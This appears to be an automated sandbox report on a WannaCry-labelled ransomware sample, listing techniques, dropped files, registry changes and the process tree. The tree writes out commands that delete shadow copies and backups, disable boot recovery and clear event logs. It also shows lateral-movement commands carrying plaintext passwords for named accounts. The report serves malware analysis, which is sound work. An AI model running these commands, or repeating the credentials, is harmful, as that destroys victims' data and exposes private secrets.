wannacry | edd1fbcf42000838a7cb6bc32d4f41d8c2f894c0e749f0239b238d0432d0bf92

Analysis

max time kernel
164s
max time network
198s
platform
windows10_x64
resource
win10v20201028
submitted
26-12-2020 20:16

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

WannaCry/Trojan-Ransom.Win32.Wanna.m.106e21fb736cb4e7a18a1746ef18e03f.dll
Size

5.0MB
MD5

106e21fb736cb4e7a18a1746ef18e03f
SHA1

77a6da4aba3f6f0f8da2d5a5d646d295ca0fb088
SHA256

54d4b7ac7bafcf657cceb0ba8231d287065a1da82f9cc8dbf4077be950bf3d8e
SHA512

0056a56bb4a95743232034ea6db0fe692c43751c4854b1695cf82989be82c987e64fa48448cc07516409f3e50c0ae9c0b6ccefb37b504cc3f7a05334a5f6e7cb

Score

10^/10

wannacry evasion ransomware worm

Malware Config

Signatures

Wannacry
WannaCry is a ransomware cryptoworm.
ransomware worm wannacry
Clears Windows event logs 1 TTPs
evasion ransomware

Indicator Removal on Host
T1070
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
ransomware evasion

Inhibit System Recovery
T1490

Processes:

bcdedit.exebcdedit.exe

pid process

1240 bcdedit.exe
3848 bcdedit.exe
Deletes backup catalog 3 TTPs 1 IoCs
Uses wbadmin.exe to inhibit system recovery.
ransomware

Command-Line Interface
T1059

File Deletion
T1107

Inhibit System Recovery
T1490

Processes:

wbadmin.exe

pid process

3600 wbadmin.exe

pid	process
1240	bcdedit.exe
3848	bcdedit.exe

pid	process
3600	wbadmin.exe

Executes dropped EXE 33 IoCs

Processes:

mssecsvc.exemssecsvc.exetasksche.exeseqwq.exe_rgs.exe_hvd.exe_hvd.exe_hvd.exe_hvd.exe_hvd.exe_hvd.exe_hvd.exe_hvd.exe_hvd.exe_hvd.exe_hvd.exe_hvd.exe_hvd.exe_hvd.exe_hvd.exe_hvd.exe_hvd.exe_hvd.exe_hvd.exe_hvd.exe_hvd.exe_hvd.exe_hvd.exe_hvd.exe_hvd.exe_hvd.exe_hvd.exe_hvd.exe

pid	process
2356	mssecsvc.exe
3156	mssecsvc.exe
2772	tasksche.exe
3592	seqwq.exe
3836	_rgs.exe
2184	_hvd.exe
3612	_hvd.exe
2188	_hvd.exe
4036	_hvd.exe
2128	_hvd.exe
4108	_hvd.exe
4168	_hvd.exe
4216	_hvd.exe
4264	_hvd.exe
4320	_hvd.exe
4392	_hvd.exe
4448	_hvd.exe
4508	_hvd.exe
4556	_hvd.exe
4604	_hvd.exe
4656	_hvd.exe
4704	_hvd.exe
4752	_hvd.exe
4800	_hvd.exe
4852	_hvd.exe
4900	_hvd.exe
4948	_hvd.exe
4996	_hvd.exe
5048	_hvd.exe
5092	_hvd.exe
4100	_hvd.exe
4156	_hvd.exe
4204	_hvd.exe

Drops file in System32 directory 7 IoCs

Processes:

mssecsvc.exe

description	ioc	process
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat	mssecsvc.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5	mssecsvc.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE	mssecsvc.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies	mssecsvc.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5	mssecsvc.exe
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies\P877MHW0.cookie	mssecsvc.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies\P877MHW0.cookie	mssecsvc.exe

Drops file in Windows directory 2 IoCs

Processes:

rundll32.exemssecsvc.exe

description ioc process

File created C:\WINDOWS\mssecsvc.exe rundll32.exe
File created C:\WINDOWS\tasksche.exe mssecsvc.exe

description	ioc	process
File created	C:\WINDOWS\mssecsvc.exe	rundll32.exe
File created	C:\WINDOWS\tasksche.exe	mssecsvc.exe

Checks SCSI registry key(s) 3 TTPs 4 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

vds.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\FriendlyName	vds.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_&PROD_HEARTDISK\4&37CE57BA&0&000000	vds.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\FriendlyName	vds.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_SANU&PROD_SANU_DVD-ROM\4&37CE57BA&0&010000	vds.exe

Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490

Processes:

vssadmin.exe

pid process

1184 vssadmin.exe

pid	process
1184	vssadmin.exe

Modifies data under HKEY_USERS 66 IoCs

Processes:

_hvd.exe_hvd.exe_hvd.exe_hvd.exe_hvd.exe_hvd.exe_hvd.exe_hvd.exemssecsvc.exe_hvd.exe_hvd.exe_hvd.exe_hvd.exe_hvd.exe_hvd.exe_hvd.exe_hvd.exe_hvd.exe_hvd.exe_hvd.exe_hvd.exe_hvd.exe_hvd.exe_hvd.exe_hvd.exe_hvd.exe_hvd.exe_hvd.exe_hvd.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_hvd.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_hvd.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_hvd.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_hvd.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_hvd.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_hvd.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_hvd.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_hvd.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	mssecsvc.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_hvd.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_hvd.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_hvd.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_hvd.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_hvd.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_hvd.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_hvd.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	mssecsvc.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_hvd.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_hvd.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_hvd.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_hvd.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:"	mssecsvc.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_hvd.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_hvd.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_hvd.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_hvd.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_hvd.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_hvd.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_hvd.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_hvd.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:"	mssecsvc.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_hvd.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_hvd.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_hvd.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_hvd.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_hvd.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_hvd.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	mssecsvc.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_hvd.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_hvd.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_hvd.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_hvd.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_hvd.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_hvd.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_hvd.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_hvd.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_hvd.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix	mssecsvc.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_hvd.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_hvd.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_hvd.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_hvd.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_hvd.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	mssecsvc.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	mssecsvc.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals	_hvd.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_hvd.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_hvd.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_hvd.exe
Key created	\REGISTRY\USER\.DEFAULT\Software	_hvd.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_hvd.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_hvd.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_hvd.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_hvd.exe

Suspicious behavior: EnumeratesProcesses 6 IoCs

Processes:

seqwq.exe

pid process

3592 seqwq.exe
3592 seqwq.exe
3592 seqwq.exe
3592 seqwq.exe
3592 seqwq.exe
3592 seqwq.exe

pid	process
3592	seqwq.exe
3592	seqwq.exe
3592	seqwq.exe
3592	seqwq.exe
3592	seqwq.exe
3592	seqwq.exe

Suspicious use of AdjustPrivilegeToken 24 IoCs

Processes:

_ftf.exeseqwq.exe_rgs.exevssvc.exewbengine.exe_hvd.exewevtutil.exe

description	pid	process
Token: SeAssignPrimaryTokenPrivilege	2308	_ftf.exe
Token: SeIncreaseQuotaPrivilege	2308	_ftf.exe
Token: SeSecurityPrivilege	2308	_ftf.exe
Token: SeTakeOwnershipPrivilege	2308	_ftf.exe
Token: SeLoadDriverPrivilege	2308	_ftf.exe
Token: SeSystemtimePrivilege	2308	_ftf.exe
Token: SeBackupPrivilege	2308	_ftf.exe
Token: SeRestorePrivilege	2308	_ftf.exe
Token: SeShutdownPrivilege	2308	_ftf.exe
Token: SeSystemEnvironmentPrivilege	2308	_ftf.exe
Token: SeUndockPrivilege	2308	_ftf.exe
Token: SeManageVolumePrivilege	2308	_ftf.exe
Token: SeDebugPrivilege	3592	seqwq.exe
Token: SeShutdownPrivilege	3836	_rgs.exe
Token: SeBackupPrivilege	1840	vssvc.exe
Token: SeRestorePrivilege	1840	vssvc.exe
Token: SeAuditPrivilege	1840	vssvc.exe
Token: SeBackupPrivilege	2800	wbengine.exe
Token: SeRestorePrivilege	2800	wbengine.exe
Token: SeSecurityPrivilege	2800	wbengine.exe
Token: SeSecurityPrivilege	3612	_hvd.exe
Token: SeBackupPrivilege	3612	_hvd.exe
Token: SeSecurityPrivilege	2188	wevtutil.exe
Token: SeBackupPrivilege	2188	wevtutil.exe

Suspicious use of WriteProcessMemory 120 IoCs

Processes:

rundll32.exerundll32.exePSEXESVC.exe_ftf.exe_rgs.execmd.execmd.execmd.execmd.execmd.exe

description	pid	process	target process
PID 3668 wrote to memory of 648	3668	rundll32.exe	rundll32.exe
PID 3668 wrote to memory of 648	3668	rundll32.exe	rundll32.exe
PID 3668 wrote to memory of 648	3668	rundll32.exe	rundll32.exe
PID 648 wrote to memory of 2356	648	rundll32.exe	mssecsvc.exe
PID 648 wrote to memory of 2356	648	rundll32.exe	mssecsvc.exe
PID 648 wrote to memory of 2356	648	rundll32.exe	mssecsvc.exe
PID 508 wrote to memory of 2308	508	PSEXESVC.exe	_ftf.exe
PID 508 wrote to memory of 2308	508	PSEXESVC.exe	_ftf.exe
PID 508 wrote to memory of 2308	508	PSEXESVC.exe	_ftf.exe
PID 2308 wrote to memory of 3592	2308	_ftf.exe	seqwq.exe
PID 2308 wrote to memory of 3592	2308	_ftf.exe	seqwq.exe
PID 2308 wrote to memory of 3836	2308	_ftf.exe	_rgs.exe
PID 2308 wrote to memory of 3836	2308	_ftf.exe	_rgs.exe
PID 2308 wrote to memory of 3836	2308	_ftf.exe	_rgs.exe
PID 3836 wrote to memory of 2676	3836	_rgs.exe	cmd.exe
PID 3836 wrote to memory of 2676	3836	_rgs.exe	cmd.exe
PID 2676 wrote to memory of 1184	2676	cmd.exe	vssadmin.exe
PID 2676 wrote to memory of 1184	2676	cmd.exe	vssadmin.exe
PID 3836 wrote to memory of 3168	3836	_rgs.exe	cmd.exe
PID 3836 wrote to memory of 3168	3836	_rgs.exe	cmd.exe
PID 3168 wrote to memory of 3600	3168	cmd.exe	wbadmin.exe
PID 3168 wrote to memory of 3600	3168	cmd.exe	wbadmin.exe
PID 3836 wrote to memory of 2576	3836	_rgs.exe	cmd.exe
PID 3836 wrote to memory of 2576	3836	_rgs.exe	cmd.exe
PID 2576 wrote to memory of 1240	2576	cmd.exe	bcdedit.exe
PID 2576 wrote to memory of 1240	2576	cmd.exe	bcdedit.exe
PID 2308 wrote to memory of 2184	2308	_ftf.exe	_hvd.exe
PID 2308 wrote to memory of 2184	2308	_ftf.exe	_hvd.exe
PID 2308 wrote to memory of 2184	2308	_ftf.exe	_hvd.exe
PID 2576 wrote to memory of 3848	2576	cmd.exe	bcdedit.exe
PID 2576 wrote to memory of 3848	2576	cmd.exe	bcdedit.exe
PID 3836 wrote to memory of 68	3836	_rgs.exe	cmd.exe
PID 3836 wrote to memory of 68	3836	_rgs.exe	cmd.exe
PID 68 wrote to memory of 3612	68	cmd.exe	wevtutil.exe
PID 68 wrote to memory of 3612	68	cmd.exe	wevtutil.exe
PID 3836 wrote to memory of 1204	3836	_rgs.exe	cmd.exe
PID 3836 wrote to memory of 1204	3836	_rgs.exe	cmd.exe
PID 2308 wrote to memory of 3612	2308	_ftf.exe	_hvd.exe
PID 2308 wrote to memory of 3612	2308	_ftf.exe	_hvd.exe
PID 2308 wrote to memory of 3612	2308	_ftf.exe	_hvd.exe
PID 1204 wrote to memory of 2188	1204	cmd.exe	wevtutil.exe
PID 1204 wrote to memory of 2188	1204	cmd.exe	wevtutil.exe
PID 2308 wrote to memory of 2188	2308	_ftf.exe	_hvd.exe
PID 2308 wrote to memory of 2188	2308	_ftf.exe	_hvd.exe
PID 2308 wrote to memory of 2188	2308	_ftf.exe	_hvd.exe
PID 2308 wrote to memory of 4036	2308	_ftf.exe	_hvd.exe
PID 2308 wrote to memory of 4036	2308	_ftf.exe	_hvd.exe
PID 2308 wrote to memory of 4036	2308	_ftf.exe	_hvd.exe
PID 2308 wrote to memory of 2128	2308	_ftf.exe	_hvd.exe
PID 2308 wrote to memory of 2128	2308	_ftf.exe	_hvd.exe
PID 2308 wrote to memory of 2128	2308	_ftf.exe	_hvd.exe
PID 2308 wrote to memory of 4108	2308	_ftf.exe	_hvd.exe
PID 2308 wrote to memory of 4108	2308	_ftf.exe	_hvd.exe
PID 2308 wrote to memory of 4108	2308	_ftf.exe	_hvd.exe
PID 2308 wrote to memory of 4168	2308	_ftf.exe	_hvd.exe
PID 2308 wrote to memory of 4168	2308	_ftf.exe	_hvd.exe
PID 2308 wrote to memory of 4168	2308	_ftf.exe	_hvd.exe
PID 2308 wrote to memory of 4216	2308	_ftf.exe	_hvd.exe
PID 2308 wrote to memory of 4216	2308	_ftf.exe	_hvd.exe
PID 2308 wrote to memory of 4216	2308	_ftf.exe	_hvd.exe
PID 2308 wrote to memory of 4264	2308	_ftf.exe	_hvd.exe
PID 2308 wrote to memory of 4264	2308	_ftf.exe	_hvd.exe
PID 2308 wrote to memory of 4264	2308	_ftf.exe	_hvd.exe
PID 2308 wrote to memory of 4320	2308	_ftf.exe	_hvd.exe

C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\WannaCry\Trojan-Ransom.Win32.Wanna.m.106e21fb736cb4e7a18a1746ef18e03f.dll,#1
1⤵
- Suspicious use of WriteProcessMemory
PID:3668

C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\WannaCry\Trojan-Ransom.Win32.Wanna.m.106e21fb736cb4e7a18a1746ef18e03f.dll,#1
2⤵
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
PID:648

C:\WINDOWS\mssecsvc.exe
C:\WINDOWS\mssecsvc.exe
3⤵
- Executes dropped EXE
- Drops file in Windows directory
PID:2356

C:\WINDOWS\tasksche.exe
C:\WINDOWS\tasksche.exe /i
4⤵
- Executes dropped EXE
PID:2772

C:\WINDOWS\mssecsvc.exe
C:\WINDOWS\mssecsvc.exe -m security
1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:3156

C:\Windows\PSEXESVC.exe
C:\Windows\PSEXESVC.exe
1⤵
- Suspicious use of WriteProcessMemory
PID:508

C:\Windows\_ftf.exe
"_ftf.exe"
2⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2308

C:\Windows\TEMP\seqwq.exe
123 \\.\pipe\95455C3A-74A0-4677-9708-B03F99818A37
3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3592

C:\Windows\TEMP\_rgs.exe
"C:\Windows\TEMP\_rgs.exe"
3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3836

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c c:\Windows\system32\vssadmin.exe delete shadows /all /quiet
4⤵
- Suspicious use of WriteProcessMemory
PID:2676

\??\c:\Windows\system32\vssadmin.exe
c:\Windows\system32\vssadmin.exe delete shadows /all /quiet
5⤵
- Interacts with shadow copies
PID:1184

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wbadmin.exe delete catalog -quiet
4⤵
- Suspicious use of WriteProcessMemory
PID:3168

C:\Windows\system32\wbadmin.exe
wbadmin.exe delete catalog -quiet
5⤵
- Deletes backup catalog
PID:3600

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no
4⤵
- Suspicious use of WriteProcessMemory
PID:2576

C:\Windows\system32\bcdedit.exe
bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
5⤵
- Modifies boot configuration data using bcdedit
PID:1240

C:\Windows\system32\bcdedit.exe
bcdedit /set {default} recoveryenabled no
5⤵
- Modifies boot configuration data using bcdedit
PID:3848

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wevtutil.exe cl System
4⤵
- Suspicious use of WriteProcessMemory
PID:68

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl System
5⤵
PID:3612

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wevtutil.exe cl Security
4⤵
- Suspicious use of WriteProcessMemory
PID:1204

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl Security
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:2188

C:\Windows\TEMP\_hvd.exe
C:\Windows\TEMP\_hvd.exe \\255.255.255.255 -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Windows\TEMP\_jwp.exe"
3⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:2184

C:\Windows\TEMP\_hvd.exe
C:\Windows\TEMP\_hvd.exe \\255.255.255.255 -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Windows\TEMP\_jwp.exe"
3⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:3612

C:\Windows\TEMP\_hvd.exe
C:\Windows\TEMP\_hvd.exe \\10.10.0.255 -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Windows\TEMP\_jwp.exe"
3⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:2188

C:\Windows\TEMP\_hvd.exe
C:\Windows\TEMP\_hvd.exe \\224.0.0.252 -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Windows\TEMP\_jwp.exe"
3⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:4036

C:\Windows\TEMP\_hvd.exe
C:\Windows\TEMP\_hvd.exe \\224.0.0.252 -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Windows\TEMP\_jwp.exe"
3⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:2128

C:\Windows\TEMP\_hvd.exe
C:\Windows\TEMP\_hvd.exe \\255.255.255.255 -u "WW930\w99a1mf0" -p "SUNTEMINdec2017" -accepteula -d -s -c -f "C:\Windows\TEMP\_jwp.exe"
3⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:4108

C:\Windows\TEMP\_hvd.exe
C:\Windows\TEMP\_hvd.exe \\255.255.255.255 -u "WW930\w99a1mf0" -p "SUNTEMINdec2017" -accepteula -d -s -c -f "C:\Windows\TEMP\_jwp.exe"
3⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:4168

C:\Windows\TEMP\_hvd.exe
C:\Windows\TEMP\_hvd.exe \\10.10.0.255 -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Windows\TEMP\_jwp.exe"
3⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:4216

C:\Windows\TEMP\_hvd.exe
C:\Windows\TEMP\_hvd.exe \\255.255.255.255 -u "RUVOZ990FILSRV\MICROSOFT$DPM$Acct" -p "1qay2wsx_!NSN2" -accepteula -d -s -c -f "C:\Windows\TEMP\_jwp.exe"
3⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:4264

C:\Windows\TEMP\_hvd.exe
C:\Windows\TEMP\_hvd.exe \\255.255.255.255 -u "RUVOZ990FILSRV\MICROSOFT$DPM$Acct" -p "1qay2wsx_!NSN2" -accepteula -d -s -c -f "C:\Windows\TEMP\_jwp.exe"
3⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:4320

C:\Windows\TEMP\_hvd.exe
C:\Windows\TEMP\_hvd.exe \\255.255.255.255 -u "WW930\a593309" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_jwp.exe"
3⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:4392

C:\Windows\TEMP\_hvd.exe
C:\Windows\TEMP\_hvd.exe \\255.255.255.255 -u "WW930\a593309" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_jwp.exe"
3⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:4448

C:\Windows\TEMP\_hvd.exe
C:\Windows\TEMP\_hvd.exe \\224.0.0.252 -u "WW930\w99a1mf0" -p "SUNTEMINdec2017" -accepteula -d -s -c -f "C:\Windows\TEMP\_jwp.exe"
3⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:4508

C:\Windows\TEMP\_hvd.exe
C:\Windows\TEMP\_hvd.exe \\224.0.0.252 -u "WW930\w99a1mf0" -p "SUNTEMINdec2017" -accepteula -d -s -c -f "C:\Windows\TEMP\_jwp.exe"
3⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:4556

C:\Windows\TEMP\_hvd.exe
C:\Windows\TEMP\_hvd.exe \\255.255.255.255 -u "emea\elena.samokhvalova" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_jwp.exe"
3⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:4604

C:\Windows\TEMP\_hvd.exe
C:\Windows\TEMP\_hvd.exe \\255.255.255.255 -u "emea\elena.samokhvalova" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_jwp.exe"
3⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:4656

C:\Windows\TEMP\_hvd.exe
C:\Windows\TEMP\_hvd.exe \\10.10.0.255 -u "WW930\w99a1mf0" -p "SUNTEMINdec2017" -accepteula -d -s -c -f "C:\Windows\TEMP\_jwp.exe"
3⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:4704

C:\Windows\TEMP\_hvd.exe
C:\Windows\TEMP\_hvd.exe \\10.10.0.255 -u "WW930\w99a1mf0" -p "SUNTEMINdec2017" -accepteula -d -s -c -f "C:\Windows\TEMP\_jwp.exe"
3⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:4752

C:\Windows\TEMP\_hvd.exe
C:\Windows\TEMP\_hvd.exe \\255.255.255.255 -u "MicrosoftOffice16_Data:SSPI:elena.samokhvalova@atos.net\(null)" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_jwp.exe"
3⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:4800

C:\Windows\TEMP\_hvd.exe
C:\Windows\TEMP\_hvd.exe \\255.255.255.255 -u "MicrosoftOffice16_Data:SSPI:elena.samokhvalova@atos.net\(null)" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_jwp.exe"
3⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:4852

C:\Windows\TEMP\_hvd.exe
C:\Windows\TEMP\_hvd.exe \\255.255.255.255 -u "10.95.47.55\WW930\reportadmin" -p "report2Admin05!" -accepteula -d -s -c -f "C:\Windows\TEMP\_jwp.exe"
3⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:4900

C:\Windows\TEMP\_hvd.exe
C:\Windows\TEMP\_hvd.exe \\255.255.255.255 -u "10.95.47.55\WW930\reportadmin" -p "report2Admin05!" -accepteula -d -s -c -f "C:\Windows\TEMP\_jwp.exe"
3⤵
